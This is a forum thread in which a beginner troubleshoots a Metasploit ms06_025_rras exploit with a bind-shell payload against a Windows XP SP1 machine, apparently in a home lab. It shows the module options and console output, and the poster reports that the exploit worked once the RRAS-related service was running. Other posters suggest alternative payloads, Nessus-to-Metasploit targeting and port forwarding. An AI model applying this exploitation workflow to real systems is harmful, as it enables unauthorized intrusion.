Results 1 to 4 of 4

Thread: ms06_025_rras Will Not Bind - help

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    3

    Default

    I am taking my first faltering steps with this so please be gentle !!

    Can anyone tell me what is happening please ? 2 PCs on same network - target = 192.168.0.5 [XP with SP1 only], Host = 192.168.0.3, No firewalls or virus software running on either.
    Extracts from terminal :

    msf exploit(ms06_025_rras) > show options
    Module options:
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST 192.168.0.5 yes The target address
    RPORT 445 yes Set the SMB service port
    SMBPIPE SRVSVC yes The pipe name to use (ROUTER, SRVSVC)

    Payload options (windows/shell_bind_tcp):
    Name Current Setting Required Description
    ---- --------------- -------- -----------
    EXITFUNC thread yes Exit technique: seh, thread, process
    LPORT 4444 yes The local port
    RHOST 192.168.0.5 no The target address

    Exploit target:
    Id Name
    -- ----
    1 Windows XP SP1

    msf exploit(ms06_025_rras) > exploit

    * Started bind handler
    * Binding to 20610036-fa22-11cf-9823-00a0c911e5df:1.0@ncacn_np:192.168.0.5[\SRVSVC] ...
    [-] Exploit failed: Could not bind to 20610036-fa22-11cf-9823-00a0c911e5df:1.0@ncacn_np:192.168.0.5[\SRVSVC]
    * Exploit completed, but no session was created.

    msf exploit(ms06_025_rras) >

    I get EXACTLY the same result if the target has NO SPs or just SP1. Also same result if I try a reverse shell payload [windows/shell_reverse_tcp]. Have run the same exploits from Linux and Windows and STILL get same result.

    Could someone point me in the right direction please ? Thanks.

    Thanks

    All sorted.
    I wasnt getting a bind because not all Windows SP1 boxes have the Remote Access Connection Manager service up and running.
    My target was set to 'Manual'. When the service was started the exploit worked as it was intended.

  2. #2

    Default

    Try to use other Payloads, or an other Exploit.
    Use the Nessus Vulnerability Scanner to find out.
    Then load it to Metasploit, it will show you the probably working exploits on your victim machine
    www.myownremote.blogspot.com

  3. #3
    Moderator fancy's Avatar
    Join Date
    Jan 2010
    Posts
    204

    Default

    As HD already outlined:

    This message indicates that the target RPC service was not available; is
    RRAS setup on these machines? This is a service you generally have to
    configure manually before exploiting it becomes possible.

  4. #4
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    6

    Post

    just as they mentioned . you may want to try another exploit. another reason why you might not be getting any results, may be due to the fact that on the port that youre suppost too be receiving a shell. that specific port may be closed. therefore you may want to look into "port forwarding".

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •